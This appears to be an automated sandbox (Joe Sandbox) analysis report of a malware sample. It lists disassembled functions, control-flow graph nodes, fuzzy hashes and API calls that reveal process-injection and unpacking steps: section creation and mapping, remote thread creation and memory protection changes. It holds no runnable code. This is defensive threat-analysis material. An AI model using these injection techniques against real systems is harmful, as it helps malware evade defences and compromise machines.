                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: d0133b7f997d866bd9f22ed6d19c972adefd9311a1b1e22c4a59d1e070b776c3
                                                                                                                            • Instruction ID: 9010f4212e2f095ee6e1513bebcb31b7ed322fe9e8888bc62802b8a5d7df5652
                                                                                                                            • Opcode Fuzzy Hash: d0133b7f997d866bd9f22ed6d19c972adefd9311a1b1e22c4a59d1e070b776c3
                                                                                                                            • Instruction Fuzzy Hash: 795128B4900249BBEF208F91CC48FAFBBB8EF85B00F140169F911BA2A5D7759941CB64
                                                                                                                            Function 00401641 Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 423 401641-401659 call 40127e 430 40165b 423->430 431 40165e-401663 423->431 430->431 433 401989-401991 431->433 434 401669-40167a 431->434 433->431 439 401996-4019dd call 40127e 433->439 437 401680-4016a9 434->437 438 401987 434->438 437->438 447 4016af-4016c6 NtDuplicateObject 437->447 438->439 447->438 449 4016cc-4016f0 NtCreateSection 447->449 451 4016f2-401713 NtMapViewOfSection 449->451 452 40174c-401772 NtCreateSection 449->452 451->452 454 401715-401731 NtMapViewOfSection 451->454 452->438 455 401778-40177c 452->455 454->452 458 401733-401749 454->458 455->438 456 401782-4017a3 NtMapViewOfSection 455->456 456->438 459 4017a9-4017c5 NtMapViewOfSection 456->459 458->452 459->438 461 4017cb call 4017d0 459->461
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                                                                                            • Instruction ID: 9e1831f0ceb5ee828940fa86c31e9463c4dc41faf1b0eb7057c6f8c584aa9f8c
                                                                                                                            • Opcode Fuzzy Hash: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                                                                                            • Instruction Fuzzy Hash: 2A5109B5900249BFEF208F91CC48FEFBBB8EF86B00F104159F911AA2A5D7719945CB64
                                                                                                                            Function 00403103 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 494 403103-403127 495 403246-40324b 494->495 496 40312d-403145 494->496 496->495 497 40314b-40315c 496->497 498 40315e-403167 497->498 499 40316c-40317a 498->499 499->499 500 40317c-403183 499->500 501 4031a5-4031ac 500->501 502 403185-4031a4 500->502 503 4031ce-4031d1 501->503 504 4031ae-4031cd 501->504 502->501 505 4031d3-4031d6 503->505 506 4031da 503->506 504->503 505->506 507 4031d8 505->507 506->498 508 4031dc-4031e1 506->508 507->508 508->495 509 4031e3-4031e6 508->509 509->495 510 4031e8-403243 RtlCreateUserThread NtTerminateProcess 509->510 510->495
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcessTerminateThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1921587553-0
                                                                                                                            • Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                                                                                            • Instruction ID: dae095e867f3745097cc185a7748a697303a2d44691d7cc8a0ebaf8866640ae2
                                                                                                                            • Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                                                                                            • Instruction Fuzzy Hash: BB415832618E0C8FD768EE6CA8896A377D6E798351B1643BAD808D7384EE30D85183C5
                                                                                                                            Function 00403257 Relevance: 3.1, APIs: 2, Instructions: 83nativethreadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 512 403257-40325f 513 4031f0-403243 RtlCreateUserThread NtTerminateProcess 512->513 514 403261-40327f 512->514 516 403246-40324b 513->516 520 403281 514->520 521 403286-403290 514->521 520->521 522 403283-403285 520->522 523 403292 521->523 524 403298-4032ba call 4012ec 521->524 522->521 523->524 525 403293-403297 523->525 530 4032be 524->530 530->530
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcessTerminateThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1921587553-0
                                                                                                                            • Opcode ID: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                                                                                            • Instruction ID: ab58b7d6b66510dde6bc1fc7e766791280fd84229bd7d6ef16cc780df24ac814
                                                                                                                            • Opcode Fuzzy Hash: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                                                                                            • Instruction Fuzzy Hash: FC1156B181C6448FE714DF78A44A23A7FE4E754326F2407BFD446E12D1D63C8246824B
                                                                                                                            Function 0053003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 66 53003c-530047 67 530049 66->67 68 53004c-530263 call 530a3f call 530e0f call 530d90 VirtualAlloc 66->68 67->68 83 530265-530289 call 530a69 68->83 84 53028b-530292 68->84 89 5302ce-5303c2 VirtualProtect call 530cce call 530ce7 83->89 86 5302a1-5302b0 84->86 88 5302b2-5302cc 86->88 86->89 88->86 95 5303d1-5303e0 89->95 96 5303e2-530437 call 530ce7 95->96 97 530439-5304b8 VirtualFree 95->97 96->95 98 5305f4-5305fe 97->98 99 5304be-5304cd 97->99 103 530604-53060d 98->103 104 53077f-530789 98->104 102 5304d3-5304dd 99->102 102->98 106 5304e3-530505 102->106 103->104 109 530613-530637 103->109 107 5307a6-5307b0 104->107 108 53078b-5307a3 104->108 117 530517-530520 106->117 118 530507-530515 106->118 110 5307b6-5307cb 107->110 111 53086e-5308be LoadLibraryA 107->111 108->107 112 53063e-530648 109->112 114 5307d2-5307d5 110->114 116 5308c7-5308f9 111->116 112->104 115 53064e-53065a 112->115 119 5307d7-5307e0 114->119 120 530824-530833 114->120 115->104 121 530660-53066a 115->121 122 530902-53091d 116->122 123 5308fb-530901 116->123 124 530526-530547 117->124 118->124 125 5307e2 119->125 126 5307e4-530822 119->126 128 530839-53083c 120->128 127 53067a-530689 121->127 123->122 129 53054d-530550 124->129 125->120 126->114 130 530750-53077a 127->130 131 53068f-5306b2 127->131 128->111 132 53083e-530847 128->132 134 5305e0-5305ef 129->134 135 530556-53056b 129->135 130->112 136 5306b4-5306ed 131->136 137 5306ef-5306fc 131->137 138 53084b-53086c 132->138 139 530849 132->139 134->102 142 53056f-53057a 135->142 143 53056d 135->143 136->137 140 53074b 137->140 141 5306fe-530748 137->141 138->128 139->111 140->127 141->140 146 53059b-5305bb 142->146 147 53057c-530599 142->147 143->134 150 5305bd-5305db 146->150 147->150 150->129
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0053024D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777432655.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_530000_DE97.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID: cess$kernel32.dll
                                                                                                                            • API String ID: 4275171209-1230238691
                                                                                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                            • Instruction ID: dbbae28743631155f3db6bb32cb2d02d0cd49f0ed6f47c960f984cfc88bdb838
                                                                                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                            • Instruction Fuzzy Hash: 7C526874A01229DFDB64CF58C995BA8BBB1BF09304F1480D9E90DAB391DB30AE95DF14
                                                                                                                            Function 00415CF4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67libraryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 465 415cf4-415cfb 466 415d00-415d10 465->466 467 415d12 466->467 468 415d18-415d1b 466->468 467->468 468->466 469 415d1d-415d3e LoadLibraryW call 415680 call 415910 468->469 474 415d40-415d47 469->474 475 415d57-415d5d 474->475 476 415d49-415d53 474->476 477 415d64-415d6b 475->477 478 415d5f call 415670 475->478 476->475 480 415d7a-415d81 477->480 481 415d6d-415d74 InterlockedDecrement 477->481 478->477 480->474 483 415d83-415d93 480->483 481->480 484 415da0-415db0 483->484 485 415db2 484->485 486 415db9-415dbc 484->486 485->486 486->484 487 415dbe-415dc9 486->487 488 415dd0-415dd5 487->488 489 415dd7-415ddd 488->489 490 415ddf-415de5 488->490 489->490 491 415de7-415df4 489->491 490->488 490->491
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNELBASE(00417374), ref: 00415D22
                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 00415D74
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777292131.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_40b000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DecrementInterlockedLibraryLoad
                                                                                                                            • String ID: @3#v$k`$}$
                                                                                                                            • API String ID: 1728580480-3392953598
                                                                                                                            • Opcode ID: 1220cc1870a5b44b748834b9607dd4274ce9cfefc33c15e109127477b7c52050
                                                                                                                            • Instruction ID: e5749c029843646b42c966e7ad9aac78be9f25e1622ba3818e79b170e44d005a
                                                                                                                            • Opcode Fuzzy Hash: 1220cc1870a5b44b748834b9607dd4274ce9cfefc33c15e109127477b7c52050
                                                                                                                            • Instruction Fuzzy Hash: B7210830940A50CFC7249B24BD497EA7760EBC8321FA2847BD9499B291C67898C0CB8D
                                                                                                                            Function 00415680 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63librarymemoryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 493 415680-4157c0 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(004F23E0), ref: 0041575F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,00419DC8), ref: 0041579C
                                                                                                                            • VirtualProtect.KERNELBASE(004F2224,004F23DC,00000040,?), ref: 004157BB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777292131.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_40b000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2099061454-3916222277
                                                                                                                            • Opcode ID: 2d56005a38fc95e630bca09700ccda0a937271889cc88ec342df8eead2b79204
                                                                                                                            • Instruction ID: 9cbdbad7550f6ba77ebf9f75069ac8a0e3d788a9a6da5ffb341793c156349206
                                                                                                                            • Opcode Fuzzy Hash: 2d56005a38fc95e630bca09700ccda0a937271889cc88ec342df8eead2b79204
                                                                                                                            • Instruction Fuzzy Hash: AD311960518780CAE305CB78FE647A23AA2EB69704F04807DD5488B3F1D7FE5928C72E
                                                                                                                            Function 006D61B2 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 531 6d61b2-6d61cb 532 6d61cd-6d61cf 531->532 533 6d61d6-6d61e2 CreateToolhelp32Snapshot 532->533 534 6d61d1 532->534 535 6d61e4-6d61ea 533->535 536 6d61f2-6d61ff Module32First 533->536 534->533 535->536 543 6d61ec-6d61f0 535->543 537 6d6208-6d6210 536->537 538 6d6201-6d6202 call 6d5e71 536->538 541 6d6207 538->541 541->537 543->532 543->536
                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006D61DA
                                                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 006D61FA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777599585.00000000006D3000.00000040.00000020.00020000.00000000.sdmp, Offset: 006D3000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_6d3000_DE97.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3833638111-0
                                                                                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                            • Instruction ID: 9ddca0fde8d1d96f1e360ec9eb91450bae318ceeca68f9febacf903917ac4f29
                                                                                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                            • Instruction Fuzzy Hash: 94F062369007106BD7203AF9DC8DBAEB6EEAF49765F10062AF642916C1DA70E8458A61
                                                                                                                            Function 00530E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 544 530e0f-530e24 SetErrorMode * 2 545 530e26 544->545 546 530e2b-530e2c 544->546 545->546
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(00000400,?,?,00530223,?,?), ref: 00530E19
                                                                                                                            • SetErrorMode.KERNELBASE(00000000,?,?,00530223,?,?), ref: 00530E1E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777432655.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_530000_DE97.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                            • Instruction ID: 744b544679e81edac46ace1a1040a10e47f9b2819e4d35e23ba8ce53e105023a
                                                                                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                            • Instruction Fuzzy Hash: BDD0123124522877D7003A94DC09BCD7F1CDF05B62F008411FB0DD9080C770994046E5
                                                                                                                            Function 004019C0 Relevance: 1.3, APIs: 1, Instructions: 68sleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 547 4019c0-4019c6 548 4019e7-401a10 547->548 549 4019c8-4019dd call 40127e 547->549 557 401a13-401a46 call 40127e Sleep call 4014fb 548->557 558 401a09-401a0c 548->558 566 401a55-401a5b 557->566 567 401a48-401a50 call 4015fb 557->567 558->557 570 401a60-401a65 566->570 571 401a69 566->571 567->566 572 401a6c-401a9a call 40127e 570->572 571->570 571->572
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3472027048-0
                                                                                                                            • Opcode ID: 4123eb2909a1ca54cf4c12ed559c674bae09e9b4b475d8bbd2d0155f979259f4
                                                                                                                            • Instruction ID: 8602aea7765920f14b43c6808a0d2033de268e003b0f0e4b19403496b7ccbc2b
                                                                                                                            • Opcode Fuzzy Hash: 4123eb2909a1ca54cf4c12ed559c674bae09e9b4b475d8bbd2d0155f979259f4
                                                                                                                            • Instruction Fuzzy Hash: 2B11CE3230A205EADB005AD9A941FBB32199B40754F3041B7B603B90F1953D8913BF2F
                                                                                                                            Function 004019E0 Relevance: 1.3, APIs: 1, Instructions: 60sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                                                                                            • Instruction ID: 6e8e83dbc6cb5325300a6df4c81bf03677ed1736eef4dabc06710691df282c78
                                                                                                                            • Opcode Fuzzy Hash: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                                                                                            • Instruction Fuzzy Hash: FA016D3230A209EADB005AD8AD41E7B3229AB40754F3001B7BA03790F1953D99137F2F
                                                                                                                            Function 004019EB Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                                                                                            • Instruction ID: 2b2adc88e5ab551374836522510027b0c35959e32ac3f93f20a40eb2707c2e9b
                                                                                                                            • Opcode Fuzzy Hash: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                                                                                            • Instruction Fuzzy Hash: C2014C3230A205EBDB009AD4ED41B6A3269AB44714F3041B7BA13B91F1D53D9A537F2B
                                                                                                                            Function 00401A04 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                                                                                            • Instruction ID: 8da435b4ef065fa937355dde1d01ef47451206c1f83fca999a74837282515cb4
                                                                                                                            • Opcode Fuzzy Hash: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                                                                                            • Instruction Fuzzy Hash: 8B01363630A209EADB005AD8AD41EBA22559B44314F3042B7BA13B91F5D53D8A137F2F
                                                                                                                            Function 004019FD Relevance: 1.3, APIs: 1, Instructions: 49sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                                                                                            • Instruction ID: da9cf87a9ed9cba2a5618582a19ce6b128e8deecbf4ee8231104359b1f28a93a
                                                                                                                            • Opcode Fuzzy Hash: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                                                                                            • Instruction Fuzzy Hash: 4601863230A209EADB005AD49D41FBA22199B44714F3041B7BA13B90F1D53D8A137F2F
                                                                                                                            Function 006D5E71 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006D5EC2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777599585.00000000006D3000.00000040.00000020.00020000.00000000.sdmp, Offset: 006D3000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_6d3000_DE97.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                            • Instruction ID: 05c5e91d8412e6c7d1a4d8fe3317cfa88623f8f20db7cb2976af24fc56b5133b
                                                                                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                            • Instruction Fuzzy Hash: 46113C79A00208FFDB01DF98C985E99BBF5AF08350F058095FA489B362D771EA50DF80
                                                                                                                            Function 00401A15 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
                                                                                                                            • Instruction ID: ef4a3633df93866afb86b86826f27a476d683f03040323dac8a7d7c578d0eba4
                                                                                                                            • Opcode Fuzzy Hash: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
                                                                                                                            • Instruction Fuzzy Hash: 17F04432309206EBDB01AAD4DD41FAA3229AB44354F3041B7BA13B90F1D53C86127F2B
                                                                                                                            Function 00401A20 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                                                                                            • Instruction ID: 08c596e776171f083f15ab2e9130eea247f108212a51f0ba4fb69116c36cf548
                                                                                                                            • Opcode Fuzzy Hash: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                                                                                            • Instruction Fuzzy Hash: 4BF0FF3230A209EADB005AD59D51EAA26699B44354F3041B7BA13B90F1D53D8A137F2B
                                                                                                                            Function 00415650 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
